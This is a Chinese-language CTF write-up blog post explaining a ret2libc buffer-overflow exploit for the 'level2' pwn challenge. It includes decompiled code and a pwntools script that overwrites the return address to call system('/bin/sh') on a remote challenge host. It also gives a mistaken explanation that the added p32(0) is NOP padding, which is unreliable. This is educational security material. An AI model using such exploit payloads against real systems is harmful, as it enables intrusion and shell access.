zoukankan      html  css  js  c++  java
  • PWN头秃之旅

    Retrun-into-libc,也写作Retrun2libc。libc是Linux下的ANSI C的函数库,包含了C语言最基本的库函数。

    Retrun2libc的前提是NX开启,但ASLR关闭,NX开启后,我们无法执行shellcode。Retrun2libc提供了一种绕过思路:修改返回地址,让其指向内存中已有的某个函数。比如通过调整参数和栈的位置,让程序跳转到libc.so中的system函数或者exec类函数,然后运行/bin/sh。

    上一篇的level0使用的解题方法就是Retrun2libc,题目给出的程序自带了一个callsystem函数,callsystem又调用了系统函数system并执行了/bin/sh。

    今天的的题目level2也是用Retrun2libc的思路解题,不过比level0难度有提升。

    checksec跑一下: 

    main伪代码:

    int __cdecl main(int argc, const char **argv, const char **envp)
    {
      vulnerable_function();
      system("echo 'Hello World!'");
      return 0;
    }
    vulnerable_function函数的伪代码:
    ssize_t vulnerable_function()
    {
      char buf; // [esp+0h] [ebp-88h]
    
      system("echo Input:");
      return read(0, &buf, 0x100u);
    }

    和level0一样,read的读入长度0x100超过了buf自身的长度0x88,因此存在溢出。解题思路是用buf覆盖返回地址然后执行/bin/sh就可以了。

    函数列表里能看到system函数有现成的,找到system的地址之后我们能不能自己传入/bin/sh呢?个人理解答案是不能!因为开启了NX,无法执行shellcode。所以第一步的checksec是很有必要的,它决定了后续的解题策略。看了下网上的write up,程序里面也有现成/bin/sh,直接拿来用就好了。

    具体步骤如下

    1. 计算覆盖返回地址需要的字节(这里用字节不知道是否准确。。。)数 = 0x88+0x4

    2.找到system函数地址: 0x08048320

    3.找到/bin/sh的地址:0x0804A024

    4.写脚本(自己依葫芦画瓢写了一个)

    r=remote("220.249.52.133",38550)
    payload='a'*0x88 + 'a'*4 + p32(0x08048320)+p32(0x0804A024)
    r.recvuntil("Input")
    r.sendline(payload)
    r.interactive()

    执行,hmmm....没成功......可能哪里没算对(又想起了咱屡战屡败的...就没一次算对过>_<)

     看了下网上大大们写的,改了一下:

    r=remote("220.249.52.133",38550)
    payload='a'*0x88 + 'a'*4 + p32(0x08048320)+p32(0)+p32(0x0804A024)
    r.recvuntil("Input")
    r.sendline(payload)
    r.interactive()

    执行脚本,拿到flag:

    把两种payload打出来看了下,没有加p(32):

    加了p(32):

     

    查了一圈看到的解释是NOP填充,NOP表示什么也不做,用来对齐代码提高程序的执行速度的,把一条不想让其执行的指令用NOP覆盖,这条指令就会失去原有的功能。个人理解这里加NOP是为了覆盖system和/bin/sh之间的指令,因为这两个地址并不是连在一起的,中间还有其他指令,所以用NOP覆盖中间那段,让system执行之后就执行/bin/sh。。。不晓得理解得对不对,先放这吧,以后接触到相关的知识再回来看(感觉这个NOP会是个神器啊~)

    本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。  

    如需转载,请注明出处,这是对他人劳动成果的尊重。

  • 相关阅读:
    随机数生成程序代码( 伪随机<stdlib.h> )
    C++的学习 (此博客将一直补充更新下去,C++语法方面的内容不开新随笔了, *【语法学习】)
    sdut oj 1510 Contest02-4 Spiral
    POJ 2017 Speed Limit (直叙式的简单模拟 编程题目 动态属性很少,难度小)
    JavaWeb-入门第一课-1.静态web动态web 2.web服务器 3.下载和安装Tomcat-web服务器
    java小知识,驼峰规则
    亚马逊 协同过滤算法 Collaborative filtering
    第一个JSP程序
    物理学步入禅境:缘起性空
    人既然知道努力就可以进步,为什么还是会不努力?
  • 原文地址:https://www.cnblogs.com/sallyzhang/p/13359577.html
Copyright © 2011-2022 走看看